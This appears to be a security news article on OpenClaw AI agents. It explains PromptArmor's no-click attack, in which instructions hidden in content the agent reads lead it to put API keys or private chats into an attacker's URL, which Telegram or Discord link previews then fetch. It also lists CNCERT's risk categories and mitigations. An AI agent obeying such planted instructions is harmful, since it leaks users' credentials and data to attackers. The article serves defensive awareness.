OpenClaw AI agents are currently facing significant security challenges, particularly with vulnerabilities that allow data leaks through indirect prompt injection attacks. These vulnerabilities can transform standard agent operations into covert channels for data exfiltration, posing considerable risks to enterprises.
Understanding the Vulnerability
The primary concern is not merely the confusion of AI models but rather their manipulation to extract sensitive data without user intervention. Security firm PromptArmor has demonstrated a sophisticated method where attackers exploit OpenClaw agents by combining indirect prompt injections with messaging app features.
The Mechanism of No-Click Attacks
In these attacks, malicious instructions are embedded within content that the AI agent is programmed to read. Upon processing, the agent creates a URL managed by the attacker, appending sensitive information such as API keys or private discussions into the URL’s query parameters. This malignant link is then sent to the user through messaging platforms like Telegram or Discord.
Critically, these platforms’ auto-preview functions can automatically fetch URLs, allowing the attack to succeed without user interaction. This automatic behavior facilitates a dangerous no-click attack, where the agent’s response itself becomes a conduit for data exfiltration.
Assessing the Risks
According to CNCERT, OpenClaw’s default security settings contribute significantly to enterprise risk, allowing agents to browse, execute tasks, and interact with local files. They categorize threats into indirect prompt injections from external data, accidental destructive actions, malicious third-party activities, and exploitation of known vulnerabilities.
The potential for damage is heightened by OpenClaw’s autonomy, making any compromise more severe. Messaging integration and auto-preview features create seamless data theft pathways, while access to hosts and containers can lead to real-world system manipulation. Additionally, unvetted extensions and proximity to operational credentials expand the attack surface.
Mitigation Strategies
Security teams should address this issue as an architectural concern rather than a simple bug. Recommended measures include disabling auto-preview features in messaging apps like Telegram and Discord, isolating OpenClaw runtimes within secure containers, and keeping default ports off public networks.
Further precautions involve restricting unnecessary file system access, ensuring credentials are not stored in plaintext, and only installing agent skills from verified sources. Network monitoring should be implemented to alert on agent-generated links pointing to unknown domains.
Ultimately, the critical question for security professionals is not whether an AI model can be manipulated, but what a manipulated agent might silently accomplish next. Proactive steps are essential to safeguard sensitive data and maintain system integrity.
